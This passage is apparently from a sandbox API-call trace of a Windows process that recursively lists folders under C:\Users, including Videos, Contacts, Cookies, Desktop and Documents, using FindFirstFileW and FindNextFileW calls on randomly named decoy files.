ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="SendTo", cAlternateFileName="")) returned 1 [0070.823] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.823] lstrlenW (lpString="SendTo") returned 6 [0070.823] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1368, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0070.823] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.823] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0070.823] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.823] lstrlenW (lpString="Start Menu") returned 10 [0070.823] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1368, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0070.823] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.823] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0070.823] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.823] lstrlenW (lpString="Templates") returned 9 [0070.823] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1368, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0070.823] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.823] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8fe8900, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8fe8900, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Videos", cAlternateFileName="")) returned 1 [0070.823] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.823] lstrlenW (lpString="Videos") returned 6 [0070.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8fe8900, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8fe8900, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7ab8 [0070.824] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8fe8900, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8fe8900, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.824] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.824] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34d49480, ftCreationTime.dwHighDateTime=0x1d5e075, ftLastAccessTime.dwLowDateTime=0xfc2b0300, ftLastAccessTime.dwHighDateTime=0x1d5db0e, ftLastWriteTime.dwLowDateTime=0xfc2b0300, ftLastWriteTime.dwHighDateTime=0x1d5db0e, nFileSizeHigh=0x0, nFileSizeLow=0x12e47, dwReserved0=0x0, dwReserved1=0x0, cFileName="5twB-3ZSOZ5hB5u6fN.avi", cAlternateFileName="5TWB-3~1.AVI")) returned 1 [0070.824] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.824] lstrlenW (lpString="5twB-3ZSOZ5hB5u6fN.avi") returned 22 [0070.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91c604f0, ftCreationTime.dwHighDateTime=0x1d5e0af, ftLastAccessTime.dwLowDateTime=0xb42ca500, ftLastAccessTime.dwHighDateTime=0x1d5dd29, ftLastWriteTime.dwLowDateTime=0xb42ca500, ftLastWriteTime.dwHighDateTime=0x1d5dd29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.824] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91c604f0, ftCreationTime.dwHighDateTime=0x1d5e0af, ftLastAccessTime.dwLowDateTime=0xb42ca500, ftLastAccessTime.dwHighDateTime=0x1d5dd29, ftLastWriteTime.dwLowDateTime=0xb42ca500, ftLastWriteTime.dwHighDateTime=0x1d5dd29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.824] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.824] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91bc210, ftCreationTime.dwHighDateTime=0x1d5dcf5, ftLastAccessTime.dwLowDateTime=0xcb627c10, ftLastAccessTime.dwHighDateTime=0x1d5dfed, ftLastWriteTime.dwLowDateTime=0xcb627c10, ftLastWriteTime.dwHighDateTime=0x1d5dfed, nFileSizeHigh=0x0, nFileSizeLow=0x14966, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="7rREBTSUi-MptldKO3.flv", cAlternateFileName="7RREBT~1.FLV")) returned 1 [0070.824] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.824] lstrlenW (lpString="7rREBTSUi-MptldKO3.flv") returned 22 [0070.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\*", lpFindFileData=0x4ef9c8 | out: lpFindFileData=0x4ef9c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37b14760, ftCreationTime.dwHighDateTime=0x1d5e643, ftLastAccessTime.dwLowDateTime=0x96e84b00, ftLastAccessTime.dwHighDateTime=0x1d5d998, ftLastWriteTime.dwLowDateTime=0x96e84b00, ftLastWriteTime.dwHighDateTime=0x1d5d998, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x200065, dwReserved1=0x88, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0070.825] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef9c8 | out: lpFindFileData=0x4ef9c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37b14760, ftCreationTime.dwHighDateTime=0x1d5e643, ftLastAccessTime.dwLowDateTime=0x96e84b00, ftLastAccessTime.dwHighDateTime=0x1d5d998, ftLastWriteTime.dwLowDateTime=0x96e84b00, ftLastWriteTime.dwHighDateTime=0x1d5d998, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x200065, dwReserved1=0x88, cFileName="..", cAlternateFileName="")) returned 1 [0070.825] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.825] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef9c8 | out: lpFindFileData=0x4ef9c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba5f9680, ftCreationTime.dwHighDateTime=0x1d5de0f, ftLastAccessTime.dwLowDateTime=0x52ba5e60, ftLastAccessTime.dwHighDateTime=0x1d5e4a5, ftLastWriteTime.dwLowDateTime=0x52ba5e60, ftLastWriteTime.dwHighDateTime=0x1d5e4a5, nFileSizeHigh=0x0, nFileSizeLow=0x11fa8, dwReserved0=0x200065, dwReserved1=0x88, cFileName="4nWpxZmSP1.swf", cAlternateFileName="4NWPXZ~1.SWF")) returned 1 [0070.825] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.825] lstrlenW (lpString="4nWpxZmSP1.swf") returned 14 [0070.825] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0070.825] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef9c8 | out: hHeap=0x4a0000) returned 1 [0070.825] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e037b80, ftCreationTime.dwHighDateTime=0x1d5e343, ftLastAccessTime.dwLowDateTime=0x97184b60, ftLastAccessTime.dwHighDateTime=0x1d5de1c, ftLastWriteTime.dwLowDateTime=0x97184b60, ftLastWriteTime.dwHighDateTime=0x1d5de1c, nFileSizeHigh=0x0, nFileSizeLow=0x820e, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="ClnaHrmkOEpNYNcDQ.avi", cAlternateFileName="CLNAHR~1.AVI")) returned 1 [0070.825] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.825] lstrlenW (lpString="ClnaHrmkOEpNYNcDQ.avi") returned 21 [0070.825] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.826] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0070.826] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91c604f0, ftCreationTime.dwHighDateTime=0x1d5e0af, ftLastAccessTime.dwLowDateTime=0xb42ca500, ftLastAccessTime.dwHighDateTime=0x1d5dd29, ftLastWriteTime.dwLowDateTime=0xb42ca500, ftLastWriteTime.dwHighDateTime=0x1d5dd29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_uSKKl0fllwwk", cAlternateFileName="_USKKL~1")) returned 0 [0070.826] FindClose (in: hFindFile=0x4d7ab8 | out: hFindFile=0x4d7ab8) returned 1 [0070.826] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.826] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8fe8900, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8fe8900, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Videos", cAlternateFileName="")) returned 0 [0070.826] FindClose (in: hFindFile=0x4e1698 | out: hFindFile=0x4e1698) returned 1 [0070.826] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0070.826] FindNextFileW (in: hFindFile=0x4dd790, lpFindFileData=0x4e1440 | out: lpFindFileData=0x4e1440*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0070.826] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.826] lstrlenW (lpString="All Users") returned 9 [0070.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\*", lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x4d7ab8 [0070.826] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0070.826] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.826] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="AppData", cAlternateFileName="")) returned 1 [0070.826] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.826] lstrlenW (lpString="AppData") returned 7 [0070.827] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1368, ftCreationTime.dwHighDateTime=0x1d5e0af, ftLastAccessTime.dwLowDateTime=0xb42ca500, ftLastAccessTime.dwHighDateTime=0x1d5dd29, ftLastWriteTime.dwLowDateTime=0xb42ca500, ftLastWriteTime.dwHighDateTime=0x1d5dd29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_uSKKl0fllwwk", cAlternateFileName="_USKKL~1")) returned 0xffffffff [0070.827] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.827] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Contacts", cAlternateFileName="")) returned 1 [0070.827] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.827] lstrlenW (lpString="Contacts") returned 8 [0070.827] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.827] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.827] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.827] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0070.827] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.827] lstrlenW (lpString="Administrator.contact") returned 21 [0070.827] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.828] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.828] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Cookies", cAlternateFileName="")) returned 1 [0070.828] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.828] lstrlenW (lpString="Cookies") returned 7 [0070.828] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1368, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0070.828] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.828] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Desktop", cAlternateFileName="")) returned 1 [0070.828] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.828] lstrlenW (lpString="Desktop") returned 7 [0070.828] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.828] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.828] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.828] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.828] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.829] lstrlenW (lpString="desktop.ini") returned 11 [0070.829] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.829] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.829] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0070.829] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.829] lstrlenW (lpString="Documents") returned 9 [0070.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.830] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.830] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.830] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, 